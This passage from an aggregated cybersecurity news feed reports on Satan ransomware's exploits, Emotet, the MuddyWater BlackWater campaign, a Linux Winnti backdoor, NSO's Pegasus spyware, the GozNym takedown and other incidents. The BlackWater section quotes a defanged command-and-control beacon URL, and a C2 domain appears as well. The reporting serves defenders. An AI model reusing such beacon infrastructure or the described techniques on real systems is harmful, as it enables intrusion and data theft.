At the same time, let’s remember that there are instances when the results yielded by such an analysis would turn out to be false positives. This lack of 100 percent accuracy thus makes manual analysis also inevitable. Anyhow, researchers are striving to develop better automated malware analysis tools with improved features that could help solve such issues, at least to a great extent.

Related Resources:

Static Malware Analysis Vs Dynamic Malware Analysis

The Fileless Malware Attacks Are Here To Stay

The post Automated Malware Analysis in the Cloud: An Introduction appeared first on .

The Satan Ransomware adds new exploits to its arsenal

A variant of the Satan ransomware recently observed includes exploits to its arsenal and targets machines leveraging additional flaws.

Experts at FortiGuard Labs have discovered a new variant of the Satan ransomware that includes new exploits to its portfolio and leverages additional vulnerabilities to infect as many machines as possible.

The Satan ransomware first appeared in the threat landscape in January 2017 when the independent malware research @Xylit0l discovered it. The ransomware belongs to the Gen:Trojan.Heur2.FU family and was offered as a RaaS (Ransomware-as-a-Service).

The Satan ransomware used RSA-2048 and AES-256 cryptography, it appends the names of encrypted files with the “.stn” extension.

Satan Ransomware

Since its discovery, the malware was costantly updated, in one of the campaigns monitored by Fortinet, it utilized a cryptominer as an additional payload to maximize its profits.

The Satan ransomware targets both Linux and Windows machines, it attempts to exploit a large number of vulnerabilities to propagate itself through public and external networks. 

The initial spreader can propagate via both private and public networks. The Windows component there were no specific changes and the ransomware still leverages the NSA EternalBlue exploit
In order to target public IPs, the spreader retrieves the list of targets from the C2 server and iterates through all of them. All the attacks observed by Fortinet originated from IP addresses located in China.

“Its initial spreader, conn.exe on Windows and conn32/64 on Linux, is capable of propagating through both private and public networks. In older campaigns, its Linux component (conn32/64) only propagates through non-Class A type private networks. However, it has recently been updated and now supports both private and public network propagation.” reads the analysis published by Fortinet. “For the Windows component (conn.exe), nothing much has really changed, and it even still carries the EternalBlue exploit (from the NSA) and the open-source application Mimikatz.”

The Satan ransomware attempt to exploits a long list of known vulnerabilities, including JBoss default configuration vulnerability (CVE-2010-0738), Tomcat arbitrary file upload vulnerability (CVE-2017-12615), WebLogic arbitrary file upload vulnerability (CVE-2018-2894), WebLogic WLS component vulnerability (CVE-2017-10271), Windows SMB remote code execution vulnerability (MS17-010), and Spring Data Commons remote code execution vulnerability (CVE-2018-1273). 

Both Windows and Linux recent variants observed by the experts include several web application remote code execution exploits. Below the list of new vulnerabilities targeted by the recently discovered varant.

The propagation method implemented performs IP address traversal and attempts to scan and execute its entire list of exploits on every IP address
encountered, along with the corresponding hardcoded port list.

“It performs IP address traversal and attempts to scan and execute its entire list of exploits on every IP address encountered, along with its corresponding hardcoded port list that is described below.” continues the analysis. “To be more efficient, it implements multi-threading, in which separate threads are spawned for every propagation attempt for every targeted IP and port. “

Experts also observed that Satan ransomware attempts to scan some applications, including Drupal, XML-RPC, Adobe, and notifies the server if an application exists, likely for statistic purpose.

“Satan Ransomware is becoming more and more aggressive with its spreading. By expanding the number of vulnerable web services and applications it targets, it increases its chance of finding another victim and generating more profits.” Fortinet concludes. “In addition, Satan Ransomware has also already adopted the Ransomware-as-a-Service scheme, opening it up to use by more threat actors, which means more attacks and more revenue,”

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Satan Ransomware, malware)

The post The Satan Ransomware adds new exploits to its arsenal appeared first on Security Affairs.

Emsisoft released a free Decrypter for JSWorm 2.0

Good news for the victims of the JSWorm 2.0 ransomware, thanks to experts at Emsisoft they can decrypt their file for free.

Experts at Emsisoft malware research team released a decrypter for a recently discovered ransomware tracked as JSWorm 2.0.

JSWorm 2.0 is written in C++ and implements Blowfish encryption. The first version of the malware was written in C# and used the “.JSWORM” extension. Researchers believe both versions were developed by the same author.

Researchers found notable callouts in two different malware samples naming ID Ransomware and several prominent malware researchers:




Experts pointed out that there have been multiple confirmed submissions to the online service ID Ransomware that allows victims to upload their encrypted files to identify the ransomware that infected their machines. Since January 2019, experts observed encrypted files uploaded from South Africa, Italy, France, Iran, Vietnam, Argentina, United States, and other countries.

“Its files have the “.[ID-<numbers>][<email>].JSWORM” extension and the ransom note file named “JSWORM-DECRYPT.txt.”” reads the post published by Emsisoft.

Once infected a computer, the JSWorm 2.0 ransomware will perform the following actions:

  • Sets the “EnableLinkedConnections” registry key, which allows it to attack mapped drives when ran as admin.
  • Restarts SMB services (lanmanworkstation) to take effect (we are investigating if there’s more to the SMB vector).
  • Stops services for databases (MSSQL, MySQL, QuickBooks), kills shadow copies, disables recovery mode.

Victims of the JSWorm ransomware have to follow the instructions below to decrypt their files for free:

  1. Download the Emsisoft JSWorm 2.0 Decrypter.
  2. Run the executable and confirm the license agreement when asked.
  3. Click “Browse” and select the ransom note file on your computer.
  4. Click “Start” to decrypt your files. Note that this may take a while.
JSWorm decrypter


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – JSWorm 2.0. ransomware)

The post Emsisoft released a free Decrypter for JSWorm 2.0 appeared first on Security Affairs.

What is Emotet?

Estimated reading time: 4 minutes

Emotet malware was first identified in 2014 as Banking trojan. Emotet has evolved from banking trojan to threat distributor till now. It has hit many organizations very badly in 2018 with its functionalities like spamming and spreading. Further with its widespread rich/existence at many organizations, it became threat distributor. Since mid of 2018, Emotet is used by threat actors to spread other malwares like TrickBot, Qakbot and most dangerous Ryuk ransomware. It has also been observed that it loads modules and launches different malware depending on geographical location i.e. Country of Victim.

Malware authors strategy is to use infected systems for all means like firstly for credential stealing, further use these credentials for spreading and spamming. Finally, when all use of this infected system is done, it deploys other malwares like Ransomware, TrickBot, Qakbot.

From mid of 2018, Emotet has become headache for security providers because of its polymorphic, self-updating and spreading capabilities which makes cleaning of such infected network very complex and sometimes takes months for cleaning.

How it can enter into your system?

It enters into your system by phishing mail as shown in below fig:

Such emails contain malicious attachments like doc, pdf, xls, js, etc. Once user opens such attachment, it will download and launch Emotet. Sometimes such mail may contain malicious links, when opened by users, it downloads and launches Emotet. Other way is through lateral spreading i.e. if one of your friend or colleagues in the same network is infected with Emotet, then your friends’ machine can deploy Emotet on your machine.

What Emotet can do?

It has many capabilities like password stealing, Email Harvesting, spamming, lateral spreading, launching other malwares. All of these are discussed in detail in our research paper on EMOTET.


According to US-CERT alert released on July 20, 2018, “Emotet continues to be amongst the most costly and destructive malware affecting state, local, tribal, and territorial (SLTT) governments, and the private and public sectors. Emotet infections have cost SLTT governments up to $1 million per incident to remediate.”

At Quick-Heal labs, we have seen many of our customers are badly affected because of spamming done by emotet. As malware sends many phishing mails to user’s contacts, mail server reaches its maximum limits and blocks user’s account for the day. As a result, most of the employees of such infected organization cannot send mails. Such blockages lead to disruption to regular operations or work and further potential harm to an organization’s reputation. Finally, after a week or two we were able to totally clean total network.

Ryuk ransomware infection may cause temporary or permanent loss of user’s critical data.

What Quick-Heals Telemetry says:

As you can see, number of hits per day are very high from July 2018 till April 19. It indicates how widespread it is. But same is not the case with actual numbers of customer escalations. At quick-heal Labs, even after detecting thousands of samples per day, we received many customer escalations in initial months after outbreak. Further, we added some rules, IOC’s, signatures at each level of Product features namely at Virus Protection, Behavior Detection, Email Protection, Memory scan, IDS & IPS, Machine learning based, Browsing protection. This directly affected in Zero customer escalations for Emotet from last few months with already infected customers also totally cleaned. As stats are indicating that we are detecting thousands of Emotet samples per day in last few months and still NO customer escalation/issue reported.

How can I remove Emotet?

If your machine is in network of any organization, then firstly isolate it immediately. Patch with latest updates of installed software’s and clean the system.

As Emotet can move laterally in network, your machine can be infected again when you reconnect to network. Identify and clean each infected machine in same network. It’s really complex process to follow. One can always choose Quick-heal Antivirus / Seqrite Endpoint Security to avoid this complex process and stay safe with cleaning of already infected machines and proactively blocking against future Emotet infections.

Preventive measures

  1. Keep your computer up-to-date with the latest updates of Operating system, Security software and other software.
  2. Don’t open any link in the mail received from an unknown/untrusted source.
  3. Don’t download attachments received by an unknown/untrusted source.
  4. Don’t enable ‘macros’ for Microsoft’s office documents.
  5. Educate yourself and others for keeping strong passwords.
  6. Use two-factor authentication where-ever possible.


Stats indicate that we are detecting thousands of Emotet samples per day in last few months and still NO customer escalation/issue has been reported. With this we can say that Quick Heal is able to stop Emotet till today’s date. As its always cat and mouse game between malware and security vendors, we expect evolution of Emotet to next step. We will be continuously monitoring Emotet for future also and will ensure all customers are secured from such malwares.

To read more about the detailed analysis of the Emotet, download this PDF.

The post What is Emotet? appeared first on Seqrite Blog.

MuddyWater BlackWater campaign used new anti-detection techniques

A recent MuddyWater campaign tracked as BlackWater shows that the APT group added new anti-detection techniques to its arsenal.

Security experts at Cisco Talos attributed the recently spotted campaign tracked as “BlackWater” to the MuddyWater APT group (aka SeedWorm and TEMP.Zagros). 

The researchers also pointed out that the cyber espionage group has been updating its tactics, techniques, and procedures (TTPs) by adding three distinct steps to their operations to avoid the detection.

The first MuddyWater campaign was observed in late 2017 when targeted entities in the Middle East.

The experts called the campaign ‘MuddyWater’ due to the confusion in attributing a wave of attacks that took place between February and October 2017 targeting entities in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States to date.

The group evolved over the years by adding new attack techniques to its arsenal.

In March 2018, experts at FireEye uncovered a massive phishing campaign conducted by the TEMP.Zagros group targeting Asia and Middle East regions from January 2018 to March 2018.

Attackers used weaponized documents typically having geopolitical themes, such as documents purporting to be from the National Assembly of Pakistan or the Institute for Development and Research in Banking Technology.

In June 2018, Trend Micro researchers discovered a new attack relying on weaponized Word documents and PowerShell scripts that appears related to the MuddyWater APT. The final payload delivered in the campaign is the PRB-BackdoorRAT, it was controlled by the command and control (C&C) server at outl00k[.]net.

This campaign aims at installing a PowerShell-based backdoor onto the victim’s machine for espionage purposes.

MuddyWater document

As part of the recent BlackWater campaign, the MuddyWater APT group leveraged an obfuscated Visual Basic for Applications (VBA) macro script to add a Run registry key and gain persistence.

Then the attackers used a PowerShell stager script masquerade as a red-teaming tool that would download a PowerShell-based Trojan from a C2 server.

The stager download from the C2 a component of the FruityC2 agent script, an open-source framework on GitHub, that uses to enumerate the host machine.

“This could allow the threat actor to monitor web logs and determine whether someone uninvolved in the campaign made a request to their server in an attempt to investigate the activity.” reads the analysis published by Talos group. “Once the enumeration commands would run, the agent would communicate with a different C2 and send back the data in the URL field. This would make host-based detection more difficult, as an easily identifiable “errors.txt” file would not be generated.”

The cyberspies also used to replace some variable strings in the more recent samples to avoid signature-based detection from Yara rules. 

Attackers used a document that once was opened, it prompted the user to enable the macro titled “BlackWater.bas”. They protected the macro with a password to prevent user to view it in Visual Basic. The “Blackwater.bas” macro was obfuscated using a substitution cipher whereby the characters are replaced by their corresponding integer. 

“This series of commands first sent a server hello message to the C2, followed by a subsequent hello message every 300 seconds. An example of this beacon is “hxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater”.” continues the analysis. “Notably, the trojanized document’s macro was also called “BlackWater,” and the value “BlackWater” was hard coded into the PowerShell script. Next, the script would enumerate the victim’s machine”

Experts conclude that even if the changes implemented by the threat actor were minimal, they were significant enough to avoid detection and to allow the group to continue to perform operations.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – MuddyWater, APT)

The post MuddyWater BlackWater campaign used new anti-detection techniques appeared first on Security Affairs.

Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques

This blog was authored by Danny Adamitis, David Maynor, and Kendall McKay

Executive summary

Cisco Talos assesses with moderate confidence that a campaign we recently discovered called “BlackWater” is associated with suspected persistent threat actor MuddyWater. Newly associated samples from April 2019 indicate attackers have added three distinct steps to their operations, allowing them to bypass certain security controls and suggesting that MuddyWater’s tactics, techniques and procedures (TTPs) have evolved to evade detection. If successful, this campaign would install a PowerShell-based backdoor onto the victim’s machine, giving the threat actors remote access. While this activity indicates the threat actor is taking steps to improve its operational security and avoid endpoint detection, the underlying code remains unchanged. The findings outlined in this blog should help threat hunting teams identify MuddyWater’s latest TTPs.

Read More

The post Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques appeared first on Cisco Blog.

Chronicle experts spotted a Linux variant of the Winnti backdoor

Security researchers from Chronicle, Alphabet’s cyber-security division, have spotted a Linux variant of the Winnti backdoor.

Security experts from Chronicle, the Alphabet’s cyber-security division, have discovered a Linux variant of the Winnti backdoor. It is the first time that researchers found a Linux version of the backdoor user by China-linked APT groups tacked as Winnti.

chinese hackers

The experts believe that under the Winnti umbrella there are several APT groups, including  Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEADPassCV, Wicked Panda, and ShadowPad. The groups show similar tactics, techniques, and Procedures (TTPs) and in some cases shared portions of the same hacking infrastructure.

Chronicle researchers while investigating the cyber attack that hit the Bayer pharmaceutical company in April.

Searching for samples of Winnti malware on its VirusTotal platform, the experts discovered a Linux variant of Winnti, dating back to 2015. At the time the malware was used in the hack of a Vietnamese gaming company.

“In April 2019, reports emerged of an intrusion involving Winnti malware at a German Pharmaceutical company.” reads the analysis published by
Chronicle. “Analysis of these larger convoluted clusters is ongoing. While reviewing a 2015 report of a Winnti intrusion at a Vietnamese gaming company, we identified a small cluster of Winnti⁶ samples designed specifically for Linux.” 

The technical analysis of the Linux version of Winnti backdoor revealed the presence of two files, the main backdoor (libxselinux) and a library ( used to avoid the detection.

The Winnti backdoor has a modular structure, it implements distinct functionalities using plugins. During the analysis, the researchers were unable to recover any active plugins. Experts believe attackers used additional modules for Linux to implement plugins for remote command execution, file exfiltration, and socks5 proxying on the infected host.

Further analysis revealed many code similarities between the Linux version of the Winnti variant and the Winnti 2.0 Windows version.

“The decoded configuration is similar in structure to the version Kaspersky classifies as Winnti 2.0, as well as samples in the 2015 Novetta report.” continues the report. “Embedded in this sample’s configuration three command-and-control server addresses and two additional strings we believe to be campaign designators. Winnti ver. 1, these values were designated as ‘tag’ and ‘group’. “

Like Windows variants of the Winnti backdoor, the Linux version also handles outbound communications using multiple protocols including ICMP, HTTP, as well as custom TCP and UDP protocols.

The Linux version also implements another feature that allows threat actors to initiate connections to infected hosts without requiring a connection to a control server.

The feature could allow attackers to directly access infected systems when access to the hard-coded control servers is disrupted.

“This secondary communication channel may be used by operators when access to the hard-coded control servers is disrupted. Additionally, the operators could leverage this feature when infecting internet-facing devices in a targeted organization to allow them to reenter a network if evicted from internal hosts.” continues the report. “This passive implant approach to network persistence has been previously observed with threat actors like Project Sauron and the Lamberts.”

In 2016, the Winniti hackers also hit German heavy industry giant ThyssenKrupp to steal company secrets.

Technical information about the above feature was also shared by the Thyssenkrupp CERT, its experts released a Nmap script that could be used to identify Winnti infections through network scanning.

“An expansion into Linux tooling indicates iteration outside of their traditionalcomfort zone. This may indicate the OS requirements of their intended targets but it may also be an attempt to take advantage of a security telemitry blindspot in many enterprises, as is with Penquin Turla and APT28’s Linux XAgent variant.” concludes the report that includes IoCs and Yara rules for the identification of the threat.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Winnti, Linux malware)

The post Chronicle experts spotted a Linux variant of the Winnti backdoor appeared first on Security Affairs.

Amnesty International filed a lawsuit against Israeli surveillance firm NSO

Amnesty International filed a lawsuit against Israeli surveillance firm NSO and fears its staff may be targeted by the company with its Pegasus spyware.

The name NSO Group made the headlines last week after the disclosure of the WhatsApp flaw exploited by the company to remotely install its surveillance software.

The Israeli firm is now facing a lawsuit backed by Amnesty International, but the non-governmental organization fears its staff may be under surveillance spyware delivered leveraging the WhatsApp issue.

The lawsuit was filed in Israel by about 50 members and supporters of the human rights group. The organization calls on the Israeli ministry of defence to ban the export of the Pegasus surveillance software developed by NSO Group.

“An affidavit from Amnesty is at the heart of the case, and concludes that “staff of Amnesty International have an ongoing and well-founded fear they may continue to be targeted and ultimately surveilled” after a hacking attempt last year.” reads the post published by The Guardian.

“The Israeli government’s Defence Export Controls Agency has failed to exercise proper oversight “despite serious allegations of abuse”, the affidavit claimed, adding: “Because of DECA’s inaction, NSO Group can continue to sell its software to governments known to target human rights defenders.””

Officially the sale of surveillance software is limited to authorized governments to support investigation of agencies on criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

In July, Citizen Lab collected evidence of attacks against 175 targets worldwide carried on with the NSO spyware. Citizen Lab uncovered other attacks against individuals in Qatar or Saudi, where the Israeli surveillance software is becoming very popular.

In August, an Amnesty International report confirmed that its experts identified a second human rights activist, in Saudi Arabia, who was targeted with the powerful spyware.

According to Joshua Franco, Amnesty’s head of technology and human rights, the trading of surveillance software is going out-of-control.

On August, the human rights group published a report that provides details on the attack against an employee at Amnesty International. The hackers attempted to compromise the mobile device of a staff member in early June by sending him a WhatsApp message about a protest in front of the Saudi Embassy in Washington.

surveillance Amnesty International NGO spyware

The organization added that such kind of attacks is becoming even more frequent, a growing number of Israeli surveillance software being used to spy on human rights operators and opposition figures in the Middle East and beyond.

Amnesty International traced the malicious link in the message to the surveillance network of the Israeli firm NSO Group.

The Guardian reported that NSO Group already faced many other lawsuits, such as the one backed by Omar Abdulaziz, a Saudi dissident based in Montreal. In December Abdulaziz filed a lawsuit in Israel in which he claimed that his phone was infected with the NSO spyware when he was in regular contact with the journalist Jamal Khashoggi.

In November, Snowden warned of abuse of surveillance software that also had a role in the murder of the Saudi Arabian journalist Jamal Khashoggi.

Khashoggi is believed to have been killed by Saudi Arabi’s agents, and the country has licensed NSO software in 2017, paying $55m for the technology.

NSO said it wants to demonstrate that it is not involved in any abuse of its technology, it prepared a report composed of 26 pages to reply to the accusations made by Amnesty and Citizen Lab.

It is curious that early 2019, a majority stake in NSO was acquired by the London based firm Novalpina Capital, founded by the banker and philanthropist Stephen Peel.

The Guardian reported an excerpt of the reply to Amnesty, signed by Peel, that states that in “almost all” the cases of complaints of human rights abuse raised, the alleged victim of hacking had not been a target or the government in question had acted with “due lawful authority”.

“We believe that the reality is different. We’ve seen them target human rights organisations and no evidence they’ve been able to effectively control governments when complaints have been raised.” replied Danna Ingleton, the deputy director of Amnesty’s technology division.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – NSO Group, Amnesty International)

The post Amnesty International filed a lawsuit against Israeli surveillance firm NSO appeared first on Security Affairs.

Ransomware and malware attacks decline, attackers adopting covert tactics

There has been a major decline in ransomware and malware attacks, with Ireland having some of the lowest rates globally, according to the latest report released by Microsoft. This is a significant change from 2017, following a prolific series of attacks that targeted supply chains globally. Initial predictions were that these would increase, however, improvements in cybersecurity measures and detection have impacted on the success rates of these attacks. In fact, there has been a … More

The post Ransomware and malware attacks decline, attackers adopting covert tactics appeared first on Help Net Security.

Ireland And Its Evolving Cybersecurity Issues

Ireland in 2018 experienced a huge decline of malware infection, most especially the lesser cases of ransomware compared to 2017. The European country of almost 5 million people is mirroring the global trend of cybersecurity issues, as cybercriminals are heavily transitioning from the disruptive and destructive ransomware to a silent yet very profitable phishing and cryptojacking. Ireland recorded in 2018 just 1.26% of monthly infection rate, which is one of the lowest in the European region and one of the lowest globally.

This is a sharp contrast to 2017 when millions of computers worldwide were heavily infected by ransomware, more particularly the likes of WannaCry and NoPetya. Cryptojacking is easy to deploy and very difficult to detect, as it is basically a program that consumes CPU/GPU resources like the rest of the programs in a computing device. But the consumed CPU/GPU resources does not produce a tangible output like a typical benign program but rather designed to compute for crypto-hashes in the attempt to mine cryptocurrency.

“While we have seen a welcome drop in ransomware and malware attacks, it would be a mistake to assume the level of the cyber threat to Irish organizations has also decreased. We are seeing major behavioral change amongst criminal hackers, who want access to a victim’s computer and an organization’s network to access data, but also use their computing power to mine for cryptocurrency. This is about playing the long game and exploiting people’s lack of training and understanding when it comes to cybercrime. Microsoft’s analysts predict phishing will continue to be an issue for the foreseeable future for that reason,” explained Des Ryan, Microsoft Ireland’s Solutions Director.

To add insult to injury, Microsoft underscored that many private and public entities in the country lack adequate staff training when it comes to cybersecurity. The vulnerable companies also practice lax IT security protocols, a trait that opens an opportunity for something that goes wrong to grow exponentially.

Also, Read:

5 Fundamental Cybersecurity Issues With Email

Will AI Solve the Gaming Industry’s Cybersecurity Issues?

How Healthcare Organizations Can Solve Cybersecurity Issues

Importance of Changes in Corporate Mindset in Preventing CyberSecurity Issues

Orange’s Acquisition of SecureLink, Set To Expand Cybersecurity Market

The post Ireland And Its Evolving Cybersecurity Issues appeared first on .

Law Enforcement Operation Dismantles GozNym Banking Malware

An international law enforcement operation has led to the dismantling of the global cybercrime networkcybercrime network that used the GozNym banking malware to steal money from bank accounts across the world.

TechCrunch reports, “Europol and the U.S. Justice Department, with help from six other countries, have disrupted and dismantled the GozNym malware, which they say stole more than $100 million from bank accounts since it first emerged.”

Prosecutors have stated, in a press conference held in The Hague, that ten defendants in five countries have been charged with using the GozNym malware to steal money from over 41,000 victims, including business and financial institutions. Of these ten people, five have been arrested in Moldova, Ukraine, Bulgaria, and Russia while the remaining five, all Russians, are on the run. The leader of the cybercrime network and his technical assistant are being prosecuted in Georgia.

TechCrunch security editor Zack Whittaker writes, “All were charged with conspiracy to commit computer fraud, conspiracy to commit wire and bank fraud and conspiracy to commit money laundering. An eleventh member of the conspiracy, Krasimir Nikolov, was previously charged and extradited to the U.S. in 2016 and pleaded guilty in April in his role in the GozNym malware network.”

He adds, “The takedown was described as an “unprecedented international effort” by Scott Brady, U.S. attorney for Western Philadelphia — where a grand jury indicted the defendants — at the press conference announcing the charges.”

The victims of the GozNym attacks have not been named, but it’s reported that in the U.S at least 11 businesses, including two law firms and a casino, plus a church, have been impacted.

The banking malware GozNym was developed from two existing malware families- Gozi and Nymaim- and spread across the U.S, Germany, Poland and Canada. It first emerged in 2016 and has hit dozens of banks and credit unions since then. The leader of the cybercrime network working behind GozNym had built it from the code of the two malware families, both of which had their source code leaked years earlier. He then recruited accomplices and advertised GozNym on Russian speaking forums.

The TechCrunch report explains how GozNym, which is described as malware “as a service”, works- “The malware used encryption and other obfuscation techniques to avoid detection by antivirus tools. Then, spammers are said to have sent hundreds of thousands of phishing emails to infect staff at businesses and banks. After the malware infected its victim computers, the malware would steal the passwords control of bank accounts, which the criminals would later log in and cash out.”

The report further says that according to prosecutors, the GozNym network was “hosted and operated through a bulletproof service, a domain and web hosting known for lax attitudes toward cybercrime and favored by criminals.”

An administrator of the “Avalanche” network, an infrastructure platform which provided services to over 200 cybercriminals and which was dismantled in 2016 during a German-led operation, had also provided bulletproof hosting services to the GozNym network. This administrator would also face prosecution in Ukraine (where his apartment is located) for his role in providing bulletproof hosting services to the GozNym network.

Also, Read:

Security Researchers Uncover Dark Tequila Banking Malware

Ramnit Banking Trojan, August 2018’s Top Malware

Multimedia Editing Software Hacked to Spread Banking Trojan

Malware Attack Using Google Cloud Computing Platform

Redaman Banking Trojan of 2015 Resurrects, Targets Russian Email Users

The post Law Enforcement Operation Dismantles GozNym Banking Malware appeared first on .

Security Affairs newsletter Round 214 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Hacking the ‘Unhackable eyeDisk USB stick
Security breach suffered by credit bureau Equifax has cost $1.4 Billion
Turkish Personal Data Protection Authority fined Facebook for Photo API bug
CVE-2019-11815 Remote Code Execution affects Linux Kernel prior to 5.0.8
Expert discovered how to brick all Samsung mobile phones
Facebook sues data analytics firm Rankwave over alleged data misuse
Over 10k+ GPS trackers could be abused to spy on individuals in the UK
Pacha Group declares war to rival crypto mining hacking groups
Reading the Yoroi Cyber Security Annual Report 2018
Malware Training Sets: FollowUP
Millions of computers powered by Intel chips are affected by MDS flaws
North Korea-linked ScarCruft APT adds Bluetooth Harvester to its arsenal
Thrangrycat flaw could allow compromising millions of Cisco devices
Unprotected DB exposed PII belonging to nearly 90% of Panama citizens
WhatsApp zero-day exploited in targeted attacks to deliver NSO spyware
Adobe patches over 80 flaws in Flash, Acrobat Reader, and Media Encoder
Microsoft Patch Tuesday addresses dangerous RDS flaw that opens to WannaCry-like attacks
SAP Security Patch Day for May 2019 fixes many missing authorization checks
Twitter inadvertently collected and shared iOS location data
A flaw in Google Titan Security Keys expose users to Bluetooth Attacks
A joint operation by international police dismantled GozNym gang
BlackTech espionage group exploited ASUS update process to deliver Plead Backdoor
Google ‘0Day In the Wild project tracks zero-days exploited in the Wild
Magecart hackers inject card Skimmer in Forbes Subscription Site
Microsoft renewed its Attack Surface Analyzer, version 2.0 is online
Past, present, and future of the Dark Web
The stealthy email stealer in the TA505 hacker groups arsenal
A flaw in Slack could allow hackers to steal, manipulate downloaded files
Chinese state-sponsored hackers breached TeamViewer in 2016
Cisco addressed a critical flaw in networks management tool Prime Infrastructure
Stack Overflow Q&A platform announced a data breach
XSS flaw in WordPress Live Chat Plugin lets attackers compromise WP sites
Dozens of Linksys router models leak data useful for hackers
Facebook banned Archimedes Group, misinformation made in Israel
Number of hacktivist attacks declined by 95 percent since 2015
Unistellar attackers already wiped over 12,000 MongoDB databases

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 214 – News of the week appeared first on Security Affairs.

May I have a word about… Pegasus spyware | Jonathan Bouquet

Is the powerful virus that infected WhatsApp a flying horse or a Trojan horse? Don’t ask the woman who developed it

The unsavoury revelations about the hacking of WhatsApp by software developed by Israeli company, NSO Group, raised some interesting imagery. NSO has developed a powerful smartphone virus called Pegasus, described by NSO co-founder Shalev Hulio as the company’s Trojan horse that could be sent “flying through the air” to infiltrate devices.

Right, let’s get this straight. Pegasus was the son of mortal Medusa and Poseidon, god of the sea. Pegasus and his brother Chrysaor were born from the blood of their beheaded mother, who was tricked and killed by Perseus. Pegasus was represented as a kind-hearted, gentle creature, somewhat naive but always eager to help.

Continue reading...

Israeli firm linked to WhatsApp spyware attack faces lawsuit

Amnesty International fears its staff may be ‘surveilled via NSO Pegasus software’

The Israeli firm linked to this week’s WhatsApp hack is facing a lawsuit backed by Amnesty International, which says it fears its staff may be under surveillance from spyware installed via the messaging service.

Related: WhatsApp urges users to update app after discovering spyware vulnerability

Related: WhatsApp spyware attack was attempt to hack human rights data, says lawyer

Related: WhatsApp hack: have I been affected and what should I do?

Continue reading...

Cyber News Rundown: WhatsApp Vulnerability Could Install Spyware

Reading Time: ~2 min.

WhatsApp Exploited to Install Spyware through Calls

A serious flaw has been discovered in the messaging app WhatsApp that would allow an attacker to install spyware on a victim’s device by manipulating the packets being sent during the call. Further disguising the attack, the malicious software could be installed without the victim answering the call, and with access to the device the attacker could also delete the call log. Fortunately, the Facebook-owned app was quick to respond and quickly released an update for affected versions. 

SIM Swapping Group Officially Charged

Nine men in their teens and 20s have been arrested and charged for a SIM-swapping operation that netted the group over $2 million in stolen cryptocurrency. The group operated by illicitly gaining access to phone accounts by having the phone swapped to a SIM card in their control. The group would then fraudulently access cryptocurrency accounts by bypassing 2-factor authentication, since login codes were sent to devices under their control. Three of the group were former telecom employees with access to the systems needed to execute the scam.

Web Trust Seal Injected with Keylogger

A recent announcement revealed that scripts for the “Trust Seals” provided by Best of the Web to highly-rated websites were compromised and redesigned to capture keystrokes from site visitors. While Best of the Web was quick to resolve the issue, at least 100 sites are still linking customers to the compromised seals. This type of supply chain attack has risen in popularity recently. Hackers have been seen injecting payment stealing malware into several large online retailer’s websites since the beginning of the year.

Fast Retailing Data Breach

The online vendor Fast Retailing is currently investigating a data breach that gave attackers full access to nearly half a million customer accounts for two of the brand’s online stores. The attack took place within the last three weeks and targeted payment information with names and addresses for customers of UNIQLO Japan and GU Japan. Fast Retailing has since forced a password reset for all online customers and delivered emails with further information for those affected by the attack.

Data Leak in Linksys Routers

Last week researchers discovered a flaw in over 25,000 Linksys routers that could give attackers access to not only the device’s MAC address, but also device names and other critical settings that could compromise the security of anyone using the router. Additionally, by identifying the device’s IP address, attackers could even use geolocation to gauge the approximate location of the exploited device, all without authentication.

The post Cyber News Rundown: WhatsApp Vulnerability Could Install Spyware appeared first on Webroot Blog.

Memory analysis is the ground truth

In recent years, enterprises have adopted next-gen endpoint protection products that are doing an admirable job detecting anomalies. For example, searching for patterns such as remote access to memory, modification of specific registry keys and alerting on other suspicious activities. However, typically anomalies only provide us with an indication that something is wrong. In order to understand the root problem, respond and ensure that a machine is entirely clean, we must search for the malicious … More

The post Memory analysis is the ground truth appeared first on Help Net Security.

Laptop Running Six Most Dangerous Malware up for Auction

This is news! A laptop containing six of the most dangerous of malware created till date is up for auction.

A Samsung NC10-14GB 10.2-Inch Blue Netbook, which contains six such malware strains which together have caused damages worth $95B over the years, has been put up for auction. This laptop has in fact been isolated and airgapped so as to prevent the spread of the malware that it contains. (Well, we know that if you are an expert, you might be cynical about the effectiveness of airgapping; but technically speaking, it’s supposed to help curb the spread of malware!).

It’s illegal to sell malware for operational purposes in the U.S. The seller of the malware-packed laptop, as per reports, has devised a way to get around this issue by calling it art. This laptop, which runs on Windows XP SP3, is now called ‘The Persistence of Chaos’.

A Forbes report dated May 15, 2019, says, “The singular laptop is an air-gapped Samsung NC10-14GB 10.2-Inch Blue Netbook (2008) running Windows XP SP3 and loaded with the malware and restart script. It also comes with a power cord, just in case the 11-year-old battery isn’t still holding a viable charge.” The report further adds, “It’s currently sitting on a white cube in a room somewhere in New York City and is being sold under the guise of art as “The Persistence of Chaos”. It’s certainly subversive and skirts the legalities of selling malware (it’s illegal to sell for operational purposes), but hey, anarchy is entertaining.”

